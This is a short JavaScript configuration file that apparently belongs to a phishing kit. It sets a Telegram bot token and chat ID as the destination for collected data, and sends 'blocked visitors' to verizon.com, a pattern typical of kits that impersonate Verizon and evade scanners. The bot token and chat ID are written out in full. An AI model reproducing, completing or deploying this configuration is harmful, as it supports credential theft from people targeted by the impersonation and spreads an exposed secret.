// ============================================================
// CONFIGURATION — Fill these in before deploying
// ============================================================

const CONFIG = {
  BOT_TOKEN: "7582530597:AAHyJXIK7K90jOhJhtQpEEqWi5gm3r4heIs",
  CHAT_ID: "7701624071",
  REDIRECT_URL: "https://www.verizon.com",  // Where blocked visitors go
};

export default CONFIG;
